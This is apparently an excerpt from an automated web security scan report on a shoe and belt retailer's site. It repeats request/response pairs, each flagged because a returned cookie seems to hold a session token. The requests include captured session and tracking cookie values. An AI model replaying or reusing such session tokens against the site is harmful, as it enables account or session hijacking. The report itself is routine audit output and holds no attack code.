GET /pebble-grain-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:02 GMT Server: Apache Set-Cookie: JSESSIONID=EE6C47A9EA24CB17EAA3B395F06B834E; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>P ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /phat-farm-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:23 GMT Server: Apache Set-Cookie: JSESSIONID=24BF0E923A6AA080E772B1A1453153C9; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>P ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /prints-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:05:38 GMT Server: Apache Set-Cookie: JSESSIONID=B578C2F9E433D6FF8347B05C36487484; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>P ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pull-up-leather-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:21 GMT Server: Apache Set-Cookie: JSESSIONID=32FEB8A5837C0779B8680573610C4B91; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>P ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /red-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:03 GMT Server: Apache Set-Cookie: JSESSIONID=457BA4111C198AD78A10690A02E43F48; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>R ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /remo-tulliani-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:24 GMT Server: Apache Set-Cookie: JSESSIONID=BF9305013C7DA1D5532CA36B4A00A8FC; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>R ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /remo-tulliani-teju/177961 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:25 GMT Server: Apache Set-Cookie: JSESSIONID=507F9DB07573722D8ADE5AD2B8F26AA4; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Remo ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /remo-tulliani-teju/177961/401476 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:25 GMT Server: Apache Set-Cookie: JSESSIONID=81A89A4F76E13B918EF54D5D5C4397EF; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Remo ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /remo-tulliani-teju/177961/401477 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:24 GMT Server: Apache Set-Cookie: JSESSIONID=67EC61833FB1087D7CE552CA640DAF9C; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Remo ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /reversible-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:05 GMT Server: Apache Set-Cookie: JSESSIONID=FC3F1E7D3762BE362BCDC8F79D4EC2D0; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>R ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /s.jsp HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 301 Moved Permanently Date: Fri, 11 Feb 2011 15:04:20 GMT Server: Apache Set-Cookie: JSESSIONID=4348D674C4124C4412654FE494A897F9; Path=/ Location: http://www.productexpress.com Content-Length: 7 Connection: close Content-Type: text/html;charset=ISO-8859-1
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /s.jsp/r_as HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:01:25 GMT Server: Apache Set-Cookie: JSESSIONID=2ECC797C0D4FC6BB8986E9FABE5B9957; Path=/ Edge-control: !no-store,max-age=10800 Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <titl ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sale-shoes.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:04:02 GMT Server: Apache Set-Cookie: JSESSIONID=F0EC5ADA786BED85C655D17D0C59625E; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>S ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sandals.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:02:13 GMT Server: Apache Set-Cookie: JSESSIONID=18EDA2757713A1C13A68F2E28DFE6955; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>S ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shoes.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:00:56 GMT Server: Apache Set-Cookie: JSESSIONID=E0E64780AD3176929E6F44465C34957E; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>S ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /size-search.jsp HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:02:01 GMT Server: Apache Set-Cookie: JSESSIONID=7D862F931F0FB1867FC96A98DB16AF44; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>S ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /skull-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:06 GMT Server: Apache Set-Cookie: JSESSIONID=F4BDC8D694CF4B42D94EFF6C564CA4A0; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>S ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /small-leather-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:05:20 GMT Server: Apache Set-Cookie: JSESSIONID=84BC6D5E1A203A247AC27E7D26B26AD3; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>S ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /smooth-leather-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:09 GMT Server: Apache Set-Cookie: JSESSIONID=FAC59F15160663548142AE409EAB0667; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>S ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
